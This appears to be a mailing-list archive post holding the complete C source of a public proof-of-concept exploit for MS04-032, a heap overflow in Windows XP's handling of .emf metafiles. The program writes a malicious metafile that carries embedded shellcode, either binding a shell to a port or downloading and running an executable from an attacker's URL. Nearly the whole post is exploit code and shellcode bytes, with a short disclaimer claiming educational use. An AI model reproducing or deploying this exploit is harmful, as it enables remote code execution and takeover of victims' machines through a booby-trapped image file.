<<< Date Index >>>     <<< Thread Index >>>

[EXPL] (MS04-032) Microsoft Windows XP Metafile (.emf) Heap Overflow (PoC)




 
---snip--- 
/* HOD-ms04032-emf-expl2.c: 
 * 
 * (MS04-032) Microsoft Windows XP Metafile (.emf) Heap 
Overflow 
 * 
 * Exploit version 0.2 (PUBLIC) coded by 
 * 
 * 
 *                 .::[ houseofdabus ]::. 
 * 
 * 
 * [at inbox dot ru] 
 * ------------------------------------------------------------------- 
 * About WMF/EMF: 
 * Windows Metafile (WMF) and Enhanced Windows 
Metafile (EMF) formats 
 * are vector files that can contain a raster image... 
 * 
 * ------------------------------------------------------------------- 
 * The vulnerability will be triggered by either viewing a 
malicious 
 * file or by navigating to a directory, which contains a 
malicious 
 * file and displays it as a thumbnail. 
 * 
 * Graphics Rendering Engine Vulnerability - 
CAN-2004-0209 
 * ------------------------------------------------------------------- 
 * Tested on: 
 *    - Internet Explorer 6.0 (SP1) (iexplore.exe) 
 *    - Explorer (explorer.exe) 
 *    - Windows XP SP1 
 * 
 * ------------------------------------------------------------------- 
 * Compile: 
 *    Win32/VC++  : cl HOD-ms04032-emf-expl.c 
 *    Win32/cygwin: gcc HOD-ms04032-emf-expl.c 
-lws2_32.lib 
 *    Linux       : gcc -o HOD-ms04032-emf-expl 
HOD-ms04032-emf-expl.c 
 * 
 * ------------------------------------------------------------------- 
 * Command Line Parameters/Arguments: 
 * 
 *   HOD.exe <file> <shellcode> <bind/connectback port> 
[connectback IP] 
 * 
 *   Shellcode: 
 *        1 - Portbind shellcode 
 *        2 - Connectback shellcode 
 * 
 * ------------------------------------------------------------------- 
 * Examples: 
 * 
 * C:\>HOD-ms04032-emf-expl.exe expl.emf 1 7777 
 * 
 * C:\>HOD-ms04032-emf-expl.exe expl.emf 2 
http://host/file.exe 
 * 
 * ------------------------------------------------------------------- 
 * 
 *   This is provided as proof-of-concept code only for 
educational 
 *   purposes and testing by authorized individuals with 
permission to 
 *   do so. 
 * 
 */ 
 
 
/* #define _WIN32 */ 
 
#include <stdio.h> 
#include <stdlib.h> 
#include <string.h> 
 
#ifdef _WIN32 
#pragma comment(lib,"ws2_32") 
#include <winsock2.h> 
 
#else 
#include <sys/types.h> 
#include <netinet/in.h> 
#include <sys/socket.h> 
#endif 
 
#include <windows.h> 
 
 
unsigned char emfheader[] =  
"\x01\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 
"\x20\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 
"\x4c\x03\x00\x00\x4c\x03\x00\x00\x20\x45\x4d\x46\x00\x00\x01\x00" 
"\x40\x00\x00\x00\x0b\x00\x00\x00\x0a\x00\x00\x00\xff\xff\x00\x00" 
 
"\xEB\x12\x90\x90\x90\x90\x90\x90" 
"\x9e\x5c\x05\x78"      /* call [edi+0x74h] - rpcrt4.dll */ 
"\xb4\x73\xed\x77";     /* Top SEH          - XP SP1 */ 
 
 
unsigned char portbind_sc[] = 
"\x90\x90\x90\x90\x90\x90\x90\x90" 
 
"\xeb\x03\x5d\xeb\x05\xe8\xf8\xff" 
"\xff\xff\x8b\xc5\x83\xc0\x11\x33\xc9\x66\xb9\xc9\x01\x80\x30\x88" 
"\x40\xe2\xfa\xdd\x03\x64\x03\x7c\x09\x64\x08\x88\x88\x88\x60\xc4" 
"\x89\x88\x88\x01\xce\x74\x77\xfe\x74\xe0\x06\xc6\x86\x64\x60\xd9" 
"\x89\x88\x88\x01\xce\x4e\xe0\xbb\xba\x88\x88\xe0\xff\xfb\xba\xd7" 
"\xdc\x77\xde\x4e\x01\xce\x70\x77\xfe\x74\xe0\x25\x51\x8d\x46\x60" 
"\xb8\x89\x88\x88\x01\xce\x5a\x77\xfe\x74\xe0\xfa\x76\x3b\x9e\x60" 
"\xa8\x89\x88\x88\x01\xce\x46\x77\xfe\x74\xe0\x67\x46\x68\xe8\x60" 
"\x98\x89\x88\x88\x01\xce\x42\x77\xfe\x70\xe0\x43\x65\x74\xb3\x60" 
"\x88\x89\x88\x88\x01\xce\x7c\x77\xfe\x70\xe0\x51\x81\x7d\x25\x60" 
"\x78\x88\x88\x88\x01\xce\x78\x77\xfe\x70\xe0\x2c\x92\xf8\x4f\x60" 
"\x68\x88\x88\x88\x01\xce\x64\x77\xfe\x70\xe0\x2c\x25\xa6\x61\x60" 
"\x58\x88\x88\x88\x01\xce\x60\x77\xfe\x70\xe0\x6d\xc1\x0e\xc1\x60" 
"\x48\x88\x88\x88\x01\xce\x6a\x77\xfe\x70\xe0\x6f\xf1\x4e\xf1\x60" 
"\x38\x88\x88\x88\x01\xce\x5e\xbb\x77\x09\x64\x7c\x89\x88\x88\xdc" 
"\xe0\x89\x89\x88\x88\x77\xde\x7c\xd8\xd8\xd8\xd8\xc8\xd8\xc8\xd8" 
"\x77\xde\x78\x03\x50\xdf\xdf\xe0\x8a\x88\xAB\x6F\x03\x44\xe2\x9e" 
"\xd9\xdb\x77\xde\x64\xdf\xdb\x77\xde\x60\xbb\x77\xdf\xd9\xdb\x77" 
"\xde\x6a\x03\x58\x01\xce\x36\xe0\xeb\xe5\xec\x88\x01\xee\x4a\x0b" 
"\x4c\x24\x05\xb4\xac\xbb\x48\xbb\x41\x08\x49\x9d\x23\x6a\x75\x4e" 
"\xcc\xac\x98\xcc\x76\xcc\xac\xb5\x01\xdc\xac\xc0\x01\xdc\xac\xc4" 
"\x01\xdc\xac\xd8\x05\xcc\xac\x98\xdc\xd8\xd9\xd9\xd9\xc9\xd9\xc1" 
"\xd9\xd9\x77\xfe\x4a\xd9\x77\xde\x46\x03\x44\xe2\x77\x77\xb9\x77" 
"\xde\x5a\x03\x40\x77\xfe\x36\x77\xde\x5e\x63\x16\x77\xde\x9c\xde" 
"\xec\x29\xb8\x88\x88\x88\x03\xc8\x84\x03\xf8\x94\x25\x03\xc8\x80" 
"\xd6\x4a\x8c\x88\xdb\xdd\xde\xdf\x03\xe4\xac\x90\x03\xcd\xb4\x03" 
"\xdc\x8d\xf0\x8b\x5d\x03\xc2\x90\x03\xd2\xa8\x8b\x55\x6b\xba\xc1" 
"\x03\xbc\x03\x8b\x7d\xbb\x77\x74\xbb\x48\x24\xb2\x4c\xfc\x8f\x49" 
"\x47\x85\x8b\x70\x63\x7a\xb3\xf4\xac\x9c\xfd\x69\x03\xd2\xac\x8b" 
"\x55\xee\x03\x84\xc3\x03\xd2\x94\x8b\x55\x03\x8c\x03\x8b\x4d\x63" 
"\x8a\xbb\x48\x03\x5d\xd7\xd6\xd5\xd3\x4a\x8c\x88"; 
 
 
unsigned char download_sc[]= 
"\x90\x90\x90\x90\x90\x90\x90\x90" 
 
"\xEB\x0F\x58\x80\x30\x17\x40\x81\x38\x6D\x30\x30\x21\x75\xF4" 
"\xEB\x05\xE8\xEC\xFF\xFF\xFF\xFE\x94\x16\x17\x17\x4A\x42\x26" 
"\xCC\x73\x9C\x14\x57\x84\x9C\x54\xE8\x57\x62\xEE\x9C\x44\x14" 
"\x71\x26\xC5\x71\xAF\x17\x07\x71\x96\x2D\x5A\x4D\x63\x10\x3E" 
"\xD5\xFE\xE5\xE8\xE8\xE8\x9E\xC4\x9C\x6D\x2B\x16\xC0\x14\x48" 
"\x6F\x9C\x5C\x0F\x9C\x64\x37\x9C\x6C\x33\x16\xC1\x16\xC0\xEB" 
"\xBA\x16\xC7\x81\x90\xEA\x46\x26\xDE\x97\xD6\x18\xE4\xB1\x65" 
"\x1D\x81\x4E\x90\xEA\x63\x05\x50\x50\xF5\xF1\xA9\x18\x17\x17" 
"\x17\x3E\xD9\x3E\xE0\xFE\xFF\xE8\xE8\xE8\x26\xD7\x71\x9C\x10" 
"\xD6\xF7\x15\x9C\x64\x0B\x16\xC1\x16\xD1\xBA\x16\xC7\x9E\xD1" 
"\x9E\xC0\x4A\x9A\x92\xB7\x17\x17\x17\x57\x97\x2F\x16\x62\xED" 
"\xD1\x17\x17\x9A\x92\x0B\x17\x17\x17\x47\x40\xE8\xC1\x7F\x13" 
"\x17\x17\x17\x7F\x17\x07\x17\x17\x7F\x68\x81\x8F\x17\x7F\x17" 
"\x17\x17\x17\xE8\xC7\x9E\x92\x9A\x17\x17\x17\x9A\x92\x18\x17" 
"\x17\x17\x47\x40\xE8\xC1\x40\x9A\x9A\x42\x17\x17\x17\x46\xE8" 
"\xC7\x9E\xD0\x9A\x92\x4A\x17\x17\x17\x47\x40\xE8\xC1\x26\xDE" 
"\x46\x46\x46\x46\x46\xE8\xC7\x9E\xD4\x9A\x92\x7C\x17\x17\x17" 
"\x47\x40\xE8\xC1\x26\xDE\x46\x46\x46\x46\x9A\x82\xB6\x17\x17" 
"\x17\x45\x44\xE8\xC7\x9E\xD4\x9A\x92\x6B\x17\x17\x17\x47\x40" 
"\xE8\xC1\x9A\x9A\x86\x17\x17\x17\x46\x7F\x68\x81\x8F\x17\xE8" 
"\xA2\x9A\x17\x17\x17\x44\xE8\xC7\x48\x9A\x92\x3E\x17\x17\x17" 
"\x47\x40\xE8\xC1\x7F\x17\x17\x17\x17\x9A\x8A\x82\x17\x17\x17" 
"\x44\xE8\xC7\x9E\xD4\x9A\x92\x26\x17\x17\x17\x47\x40\xE8\xC1" 
"\xE8\xA2\x86\x17\x17\x17\xE8\xA2\x9A\x17\x17\x17\x44\xE8\xC7" 
"\x9A\x92\x2E\x17\x17\x17\x47\x40\xE8\xC1\x44\xE8\xC7\x9A\x92" 
"\x56\x17\x17\x17\x47\x40\xE8\xC1\x7F\x12\x17\x17\x17\x9A\x9A" 
"\x82\x17\x17\x17\x46\xE8\xC7\x9A\x92\x5E\x17\x17\x17\x47\x40" 
"\xE8\xC1\x7F\x17\x17\x17\x17\xE8\xC7\xFF\x6F\xE9\xE8\xE8\x50" 
"\x72\x63\x47\x65\x78\x74\x56\x73\x73\x65\x72\x64\x64\x17\x5B" 
"\x78\x76\x73\x5B\x7E\x75\x65\x76\x65\x6E\x56\x17\x41\x7E\x65" 
"\x63\x62\x76\x7B\x56\x7B\x7B\x78\x74\x17\x48\x7B\x74\x65\x72" 
"\x76\x63\x17\x48\x7B\x60\x65\x7E\x63\x72\x17\x48\x7B\x74\x7B" 
"\x78\x64\x72\x17\x40\x7E\x79\x52\x6F\x72\x74\x17\x52\x6F\x7E" 
"\x63\x47\x65\x78\x74\x72\x64\x64\x17\x40\x7E\x79\x5E\x79\x72" 
"\x63\x17\x5E\x79\x63\x72\x65\x79\x72\x63\x58\x67\x72\x79\x56" 
"\x17\x5E\x79\x63\x72\x65\x79\x72\x63\x58\x67\x72\x79\x42\x65" 
"\x7B\x56\x17\x5E\x79\x63\x72\x65\x79\x72\x63\x45\x72\x76\x73" 
"\x51\x7E\x7B\x72\x17\x17\x17\x17\x17\x17\x17\x17\x17\x7A\x27" 
"\x27\x39\x72\x6F\x72\x17""HOD""\x21"; 
 
unsigned char endoffile[] = "\x00\x00\x00\x00"; 
 
 
void 
usage(char *prog) 
{ 
        printf("Usage:\n"); 
        printf("%s <file> <shellcode> <bindport / url>\n", prog); 
        printf("\nShellcode:\n"); 
        printf("      1 - Portbind shellcode\n"); 
        printf("      2 - Download & exec shellcode\n\n"); 
        exit(0); 
} 
 
 
int 
main(int argc, char **argv) 
{ 
        char endofurl = '\x01'; 
        unsigned short port; 
        int sc; 
        FILE *fp; 
 
        printf("\n(MS04-032) Microsoft Windows XP Metafile 
(.emf) Heap Overflow\n\n"); 
        printf("--- Coded by .::[ houseofdabus ]::. ---\n\n"); 
 
        if (argc < 4) usage(argv[0]); 
 
        sc = atoi(argv[2]); 
        if ((sc > 2) || (sc < 1)) usage(argv[0]); 
 
        fp = fopen(argv[1], "wb"); 
        if (fp == NULL) { 
                printf("[-] error: can\'t create file: %s\n", argv[1]); 
                exit(0); 
        } 
 
        /* header */ 
        fwrite(emfheader, 1, sizeof(emfheader)-1, fp); 
 
        printf("[*] Shellcode: "); 
        if (sc == 1) { 
                port = atoi(argv[3]); 
                printf("Portbind, port = %u\n", port); 
                port = htons(port^(unsigned short)0x8888); 
                memcpy(portbind_sc+266, &port, 2); 
                fwrite(portbind_sc, 1, sizeof(portbind_sc)-1, fp); 
                fwrite(endoffile, 1, 4, fp); 
        } 
        else { 
                printf("Download & exec, url = %s\n", argv[3]); 
                fwrite(download_sc, 1, sizeof(download_sc)-1, 
fp); 
                fwrite(argv[3], 1, strlen(argv[3]), fp); 
                fwrite(&endofurl, 1, 1, fp); 
                fwrite(endoffile, 1, 4, fp); 
        } 
 
        printf("[+] Ok\n"); 
        fclose(fp); 
 
return 0; 
} 
 
---snip---